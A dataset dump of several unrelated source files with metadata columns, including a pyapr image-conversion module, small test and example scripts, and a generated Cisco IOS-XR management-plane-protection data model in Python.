| 34.836735
| 75
| 0.318102
| 120
| 1,707
| 11.508333
| 0.458333
| 0.047067
| 0.04924
| 0.045619
| 0.74294
| 0.703838
| 0.703838
| 0.703838
| 0.703838
| 0.703838
| 0
| 0.012203
| 0.087873
| 1,707
| 48
| 76
| 35.5625
| 0.318561
| 0.667838
| 0
| 0
| 0
| 0
| 0.245841
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81becf0f8669a1954b155b671c2eec2206947dff
| 5,334
|
py
|
Python
|
pyapr/converter/converter_methods.py
|
mosaic-group/PyLibAPR
|
4b5af50c26b4770c460460f9491bd840af2537da
|
[
"Apache-2.0"
] | 7
|
2021-07-02T11:08:30.000Z
|
2022-03-07T20:54:33.000Z
|
pyapr/converter/converter_methods.py
|
mosaic-group/PyLibAPR
|
4b5af50c26b4770c460460f9491bd840af2537da
|
[
"Apache-2.0"
] | 19
|
2020-12-17T09:32:09.000Z
|
2022-01-08T20:22:16.000Z
|
pyapr/converter/converter_methods.py
|
mosaic-group/PyLibAPR
|
4b5af50c26b4770c460460f9491bd840af2537da
|
[
"Apache-2.0"
] | 1
|
2021-01-19T14:23:36.000Z
|
2021-01-19T14:23:36.000Z
|
import pyapr
import numpy as np
def get_apr(image, rel_error=0.1, gradient_smoothing=2, verbose=True, params=None):
# check that the image array is c-contiguous
if not image.flags['C_CONTIGUOUS']:
print('WARNING: \'image\' argument given to get_apr is not C-contiguous \n'
'input image has been replaced with a C-contiguous copy of itself')
image = np.ascontiguousarray(image)
# Initialize objects
apr = pyapr.APR()
if params is None:
par = pyapr.APRParameters()
par.auto_parameters = True
par.rel_error = rel_error
par.gradient_smoothing = gradient_smoothing
else:
par = params
if image.dtype == np.float32:
parts = pyapr.FloatParticles()
converter = pyapr.converter.FloatConverter()
elif image.dtype == np.uint16:
parts = pyapr.ShortParticles()
converter = pyapr.converter.ShortConverter()
# elif image.dtype in {'byte', 'uint8'}: # currently not working
# parts = pyapr.ByteParticles()
# converter = pyapr.converter.ByteConverter()
else:
errstr = 'pyapr.converter.get_apr: input image dtype must be numpy.uint16 or numpy.float32, ' \
'but {} was given'.format(image.dtype)
raise TypeError(errstr)
converter.set_parameters(par)
converter.set_verbose(verbose)
# Compute the APR and sample particles
converter.get_apr(apr, image)
parts.sample_image(apr, image)
return apr, parts
def get_apr_interactive(image, rel_error=0.1, gradient_smoothing=2, verbose=True, params=None, slider_decimals=1):
# check that the image array is c-contiguous
if not image.flags['C_CONTIGUOUS']:
print('WARNING: \'image\' argument given to get_apr_interactive is not C-contiguous \n'
'input image has been replaced with a C-contiguous copy of itself')
image = np.ascontiguousarray(image)
while image.ndim < 3:
image = np.expand_dims(image, axis=0)
# Initialize objects
io_int = pyapr.InteractiveIO()
apr = pyapr.APR()
if params is None:
par = pyapr.APRParameters()
par.auto_parameters = False
par.rel_error = rel_error
par.gradient_smoothing = gradient_smoothing
else:
par = params
if image.dtype == np.float32:
parts = pyapr.FloatParticles()
converter = pyapr.converter.FloatConverter()
elif image.dtype == np.uint16:
parts = pyapr.ShortParticles()
converter = pyapr.converter.ShortConverter()
# elif image.dtype in {'byte', 'uint8'}: # currently not working
# parts = pyapr.ByteParticles()
# converter = pyapr.converter.ByteConverter()
else:
errstr = 'pyapr.converter.get_apr_interactive: input image dtype must be numpy.uint16 or numpy.float32, ' \
'but {} was given'.format(image.dtype)
raise TypeError(errstr)
converter.set_parameters(par)
converter.set_verbose(verbose)
# launch interactive APR converter
io_int.interactive_apr(converter, apr, image, slider_decimals=slider_decimals)
if verbose:
print("Total number of particles: {}".format(apr.total_number_particles()))
print("Number of pixels in original image: {}".format(image.size))
cr = image.size/apr.total_number_particles()
print("Compuational Ratio: {:7.2f}".format(cr))
# sample particles
parts.sample_image(apr, image)
return apr, parts
def find_parameters_interactive(image, rel_error=0.1, gradient_smoothing=0, verbose=True, params=None, slider_decimals=1):
# check that the image array is c-contiguous
if not image.flags['C_CONTIGUOUS']:
print('WARNING: \'image\' argument given to find_parameters_interactive is not C-contiguous \n'
'input image has been replaced with a C-contiguous copy of itself')
image = np.ascontiguousarray(image)
while image.ndim < 3:
image = np.expand_dims(image, axis=0)
# Initialize objects
io_int = pyapr.filegui.InteractiveIO()
apr = pyapr.APR()
if params is None:
par = pyapr.APRParameters()
par.auto_parameters = False
par.rel_error = rel_error
par.gradient_smoothing = gradient_smoothing
else:
par = params
if image.dtype == np.float32:
converter = pyapr.converter.FloatConverter()
elif image.dtype == np.uint16:
converter = pyapr.converter.ShortConverter()
# elif image.dtype in {'byte', 'uint8'}: # currently not working
# converter = pyapr.converter.ByteConverter()
else:
errstr = 'pyapr.converter.find_parameters_interactive: input image dtype must be numpy.uint16 or numpy.float32, ' \
'but {} was given'.format(image.dtype)
raise TypeError(errstr)
converter.set_parameters(par)
converter.set_verbose(verbose)
# launch interactive APR converter
par = io_int.find_parameters_interactive(converter, apr, image, slider_decimals=slider_decimals)
if verbose:
print("---------------------------------")
print("Using the following parameters:")
print("grad_th = {}, sigma_th = {}, Ip_th = {}".format(par.grad_th, par.sigma_th, par.Ip_th))
print("---------------------------------")
return par
| 35.798658
| 123
| 0.655231
| 645
| 5,334
| 5.305426
| 0.181395
| 0.043834
| 0.060491
| 0.012274
| 0.870251
| 0.853887
| 0.853887
| 0.853887
| 0.820573
| 0.779369
| 0
| 0.010755
| 0.233033
| 5,334
| 148
| 124
| 36.040541
| 0.825715
| 0.132358
| 0
| 0.757576
| 0
| 0
| 0.215588
| 0.04277
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.020202
| 0
| 0.080808
| 0.10101
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81d2b88773f7ac335ce891860ac99cb204b289f7
| 1,070
|
py
|
Python
|
tests/etl/workflow/regimen_to_treatment/expected_outputs.py
|
PDCMFinder/pdcm-etl
|
df0006e4ad5ca2ddf9c1387e28a0b7fb24f195de
|
[
"Apache-2.0"
] | 1
|
2022-01-28T16:01:59.000Z
|
2022-01-28T16:01:59.000Z
|
tests/etl/workflow/regimen_to_treatment/expected_outputs.py
|
PDCMFinder/pdcm-etl
|
df0006e4ad5ca2ddf9c1387e28a0b7fb24f195de
|
[
"Apache-2.0"
] | 37
|
2022-02-09T18:19:13.000Z
|
2022-03-29T12:14:19.000Z
|
tests/etl/workflow/regimen_to_treatment/expected_outputs.py
|
PDCMFinder/pdcm-etl
|
df0006e4ad5ca2ddf9c1387e28a0b7fb24f195de
|
[
"Apache-2.0"
] | null | null | null |
expected_regimen_to_treatment = [
{
"id": "1",
"regimen_ontology_term_id": "1",
"treatment_ontology_term_id": "1"
},
{
"id": "2",
"regimen_ontology_term_id": "1",
"treatment_ontology_term_id": "2"
},
{
"id": "3",
"regimen_ontology_term_id": "1",
"treatment_ontology_term_id": "3"
},
{
"id": "4",
"regimen_ontology_term_id": "1",
"treatment_ontology_term_id": "4"
},
{
"id": "5",
"regimen_ontology_term_id": "1",
"treatment_ontology_term_id": "5"
},
{
"id": "6",
"regimen_ontology_term_id": "1",
"treatment_ontology_term_id": "6"
},
{
"id": "7",
"regimen_ontology_term_id": "2",
"treatment_ontology_term_id": "7"
},
{
"id": "8",
"regimen_ontology_term_id": "2",
"treatment_ontology_term_id": "1"
},
{
"id": "9",
"regimen_ontology_term_id": "2",
"treatment_ontology_term_id": "8"
}
]
| 22.291667
| 41
| 0.48972
| 112
| 1,070
| 4.169643
| 0.142857
| 0.462527
| 0.539615
| 0.404711
| 0.880086
| 0.880086
| 0.867238
| 0.867238
| 0.867238
| 0
| 0
| 0.038244
| 0.340187
| 1,070
| 47
| 42
| 22.765957
| 0.623229
| 0
| 0
| 0.234043
| 0
| 0
| 0.462617
| 0.420561
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c4b6fe0bb543bd533c5e2067f3bf734ba2815250
| 876
|
py
|
Python
|
tests/test_ret_types.py
|
Cologler/bytecode2ast-python
|
407b261a493e018bc86388040ddfb6fb0e4b96d9
|
[
"MIT"
] | null | null | null |
tests/test_ret_types.py
|
Cologler/bytecode2ast-python
|
407b261a493e018bc86388040ddfb6fb0e4b96d9
|
[
"MIT"
] | null | null | null |
tests/test_ret_types.py
|
Cologler/bytecode2ast-python
|
407b261a493e018bc86388040ddfb6fb0e4b96d9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2019~2999 - Cologler <skyoflw@gmail.com>
# ----------
#
# ----------
from utils import get_instrs_from_b2a, get_instrs
def test_return_none():
def func():
return None
assert get_instrs(func) == get_instrs_from_b2a(func)
def test_return_true():
def func():
return True
assert get_instrs(func) == get_instrs_from_b2a(func)
def test_return_false():
def func():
return False
assert get_instrs(func) == get_instrs_from_b2a(func)
def test_return_int():
def func():
return 10
assert get_instrs(func) == get_instrs_from_b2a(func)
def test_return_str():
def func():
return '10'
assert get_instrs(func) == get_instrs_from_b2a(func)
def test_return_bytes():
def func():
return b'10'
assert get_instrs(func) == get_instrs_from_b2a(func)
| 19.466667
| 56
| 0.644977
| 123
| 876
| 4.268293
| 0.243902
| 0.24
| 0.173333
| 0.213333
| 0.630476
| 0.630476
| 0.630476
| 0.630476
| 0.630476
| 0.630476
| 0
| 0.032164
| 0.219178
| 876
| 44
| 57
| 19.909091
| 0.73538
| 0.111872
| 0
| 0.48
| 0
| 0
| 0.005188
| 0
| 0
| 0
| 0
| 0
| 0.24
| 1
| 0.48
| true
| 0
| 0.04
| 0.24
| 0.76
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
c4be772540ff6830b9282271962bf59995e2a59d
| 436
|
py
|
Python
|
examples/python/cpu/tensors/tensor_reshape_01.py
|
kant/ocean-tensor-package
|
fb3fcff8bba7f4ef6cd8b8d02f0e1be1258da02d
|
[
"Apache-2.0"
] | 27
|
2018-08-16T21:32:49.000Z
|
2021-11-30T10:31:08.000Z
|
examples/python/cpu/tensors/tensor_reshape_01.py
|
kant/ocean-tensor-package
|
fb3fcff8bba7f4ef6cd8b8d02f0e1be1258da02d
|
[
"Apache-2.0"
] | null | null | null |
examples/python/cpu/tensors/tensor_reshape_01.py
|
kant/ocean-tensor-package
|
fb3fcff8bba7f4ef6cd8b8d02f0e1be1258da02d
|
[
"Apache-2.0"
] | 13
|
2018-08-17T17:33:16.000Z
|
2021-11-30T10:31:09.000Z
|
import pyOcean_cpu as ocean
# Fortran-style strides
a = ocean.tensor([3,4],'F');
a.copy(range(a.nelem))
print(a)
print(a.strides)
b = a.reshape([2,3,2])
print(b)
print(b.storage.obj == a.storage.obj)
a.reshape([2,6],True)
print(a)
# C-style strides
a = ocean.tensor([3,4],'C');
a.copy(range(a.nelem))
print(a)
print(a.strides)
b = a.reshape([2,3,2])
print(b)
print(b.storage.obj == a.storage.obj)
a.reshape([2,6],True)
print(a)
| 14.533333
| 37
| 0.655963
| 87
| 436
| 3.275862
| 0.287356
| 0.126316
| 0.126316
| 0.126316
| 0.884211
| 0.884211
| 0.884211
| 0.701754
| 0.701754
| 0.701754
| 0
| 0.036082
| 0.110092
| 436
| 29
| 38
| 15.034483
| 0.698454
| 0.084862
| 0
| 0.842105
| 0
| 0
| 0.005063
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.052632
| 0.526316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
c4c3e62adf0aa32d271b739ebd85610d1721338c
| 28,122
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_lib_mpp_oper.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_lib_mpp_oper.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_lib_mpp_oper.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
""" Cisco_IOS_XR_lib_mpp_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR lib\-mpp package operational data.
This module contains definitions
for the following management objects\:
management\-plane\-protection\: Management Plane Protection (MPP)
operational data
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class MppAllowEnum(Enum):
"""
MppAllowEnum
MPP protocol types
.. data:: ssh = 0
SSH protocol
.. data:: telnet = 1
TELNET protocol
.. data:: snmp = 2
SNMP protocol
.. data:: tftp = 3
TFTP protocol
.. data:: http = 4
HTTP protocol
.. data:: xr_xml = 5
XML
.. data:: netconf = 6
NETCONF protocol
.. data:: all = 7
All
"""
ssh = 0
telnet = 1
snmp = 2
tftp = 3
http = 4
xr_xml = 5
netconf = 6
all = 7
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['MppAllowEnum']
class MppAfIdBaseIdentity(object):
"""
Base identity for Mpp\-af\-id
"""
_prefix = 'Cisco-IOS-XR-lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
pass
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['MppAfIdBaseIdentity']['meta_info']
class ManagementPlaneProtection(object):
"""
Management Plane Protection (MPP) operational
data
.. attribute:: inband
Management Plane Protection (MPP) inband interface data
**type**\: :py:class:`Inband <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Inband>`
.. attribute:: outband
Management Plane Protection (MPP) outband interface data
**type**\: :py:class:`Outband <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Outband>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.inband = ManagementPlaneProtection.Inband()
self.inband.parent = self
self.outband = ManagementPlaneProtection.Outband()
self.outband.parent = self
class Outband(object):
"""
Management Plane Protection (MPP) outband
interface data
.. attribute:: interfaces
List of inband/outband interfaces
**type**\: :py:class:`Interfaces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Outband.Interfaces>`
.. attribute:: vrf
Outband VRF information
**type**\: :py:class:`Vrf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Outband.Vrf>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.interfaces = ManagementPlaneProtection.Outband.Interfaces()
self.interfaces.parent = self
self.vrf = ManagementPlaneProtection.Outband.Vrf()
self.vrf.parent = self
class Vrf(object):
"""
Outband VRF information
.. attribute:: vrf_name
Outband VRF name
**type**\: str
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.vrf_name = None
@property
def _common_path(self):
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:outband/Cisco-IOS-XR-lib-mpp-oper:vrf'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Outband.Vrf']['meta_info']
class Interfaces(object):
"""
List of inband/outband interfaces
.. attribute:: interface
MPP interface information
**type**\: list of :py:class:`Interface <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Outband.Interfaces.Interface>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.interface = YList()
self.interface.parent = self
self.interface.name = 'interface'
class Interface(object):
"""
MPP interface information
.. attribute:: interface_name <key>
Interface name, specify 'all' for all interfaces
**type**\: str
.. attribute:: protocol
MPP Interface protocols
**type**\: list of :py:class:`Protocol <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Outband.Interfaces.Interface.Protocol>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.interface_name = None
self.protocol = YList()
self.protocol.parent = self
self.protocol.name = 'protocol'
class Protocol(object):
"""
MPP Interface protocols
.. attribute:: allow
MPP allow
**type**\: :py:class:`MppAllowEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.MppAllowEnum>`
.. attribute:: is_all_peers_allowed
If TRUE, all peers are allowed
**type**\: bool
.. attribute:: peer_address
List of peer addresses
**type**\: list of :py:class:`PeerAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Outband.Interfaces.Interface.Protocol.PeerAddress>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.allow = None
self.is_all_peers_allowed = None
self.peer_address = YList()
self.peer_address.parent = self
self.peer_address.name = 'peer_address'
class PeerAddress(object):
"""
List of peer addresses
.. attribute:: af_name
AFName
**type**\: :py:class:`MppAfIdBaseIdentity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.MppAfIdBaseIdentity>`
.. attribute:: ipv4_address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.af_name = None
self.ipv4_address = None
self.ipv6_address = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-lib-mpp-oper:peer-address'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.af_name is not None:
return True
if self.ipv4_address is not None:
return True
if self.ipv6_address is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Outband.Interfaces.Interface.Protocol.PeerAddress']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-lib-mpp-oper:protocol'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.allow is not None:
return True
if self.is_all_peers_allowed is not None:
return True
if self.peer_address is not None:
for child_ref in self.peer_address:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Outband.Interfaces.Interface.Protocol']['meta_info']
@property
def _common_path(self):
if self.interface_name is None:
raise YPYModelError('Key property interface_name is None')
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:outband/Cisco-IOS-XR-lib-mpp-oper:interfaces/Cisco-IOS-XR-lib-mpp-oper:interface[Cisco-IOS-XR-lib-mpp-oper:interface-name = ' + str(self.interface_name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.interface_name is not None:
return True
if self.protocol is not None:
for child_ref in self.protocol:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Outband.Interfaces.Interface']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:outband/Cisco-IOS-XR-lib-mpp-oper:interfaces'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.interface is not None:
for child_ref in self.interface:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Outband.Interfaces']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:outband'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.interfaces is not None and self.interfaces._has_data():
return True
if self.vrf is not None and self.vrf._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Outband']['meta_info']
class Inband(object):
"""
Management Plane Protection (MPP) inband
interface data
.. attribute:: interfaces
List of inband/outband interfaces
**type**\: :py:class:`Interfaces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Inband.Interfaces>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.interfaces = ManagementPlaneProtection.Inband.Interfaces()
self.interfaces.parent = self
class Interfaces(object):
"""
List of inband/outband interfaces
.. attribute:: interface
MPP interface information
**type**\: list of :py:class:`Interface <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Inband.Interfaces.Interface>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.interface = YList()
self.interface.parent = self
self.interface.name = 'interface'
class Interface(object):
"""
MPP interface information
.. attribute:: interface_name <key>
Interface name, specify 'all' for all interfaces
**type**\: str
.. attribute:: protocol
MPP Interface protocols
**type**\: list of :py:class:`Protocol <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Inband.Interfaces.Interface.Protocol>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.interface_name = None
self.protocol = YList()
self.protocol.parent = self
self.protocol.name = 'protocol'
class Protocol(object):
"""
MPP Interface protocols
.. attribute:: allow
MPP allow
**type**\: :py:class:`MppAllowEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.MppAllowEnum>`
.. attribute:: is_all_peers_allowed
If TRUE, all peers are allowed
**type**\: bool
.. attribute:: peer_address
List of peer addresses
**type**\: list of :py:class:`PeerAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Inband.Interfaces.Interface.Protocol.PeerAddress>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.allow = None
self.is_all_peers_allowed = None
self.peer_address = YList()
self.peer_address.parent = self
self.peer_address.name = 'peer_address'
class PeerAddress(object):
"""
List of peer addresses
.. attribute:: af_name
AFName
**type**\: :py:class:`MppAfIdBaseIdentity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.MppAfIdBaseIdentity>`
.. attribute:: ipv4_address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.af_name = None
self.ipv4_address = None
self.ipv6_address = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-lib-mpp-oper:peer-address'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.af_name is not None:
return True
if self.ipv4_address is not None:
return True
if self.ipv6_address is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Inband.Interfaces.Interface.Protocol.PeerAddress']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-lib-mpp-oper:protocol'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.allow is not None:
return True
if self.is_all_peers_allowed is not None:
return True
if self.peer_address is not None:
for child_ref in self.peer_address:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Inband.Interfaces.Interface.Protocol']['meta_info']
@property
def _common_path(self):
if self.interface_name is None:
raise YPYModelError('Key property interface_name is None')
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:inband/Cisco-IOS-XR-lib-mpp-oper:interfaces/Cisco-IOS-XR-lib-mpp-oper:interface[Cisco-IOS-XR-lib-mpp-oper:interface-name = ' + str(self.interface_name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.interface_name is not None:
return True
if self.protocol is not None:
for child_ref in self.protocol:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Inband.Interfaces.Interface']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:inband/Cisco-IOS-XR-lib-mpp-oper:interfaces'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.interface is not None:
for child_ref in self.interface:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Inband.Interfaces']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:inband'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.interfaces is not None and self.interfaces._has_data():
return True
return False
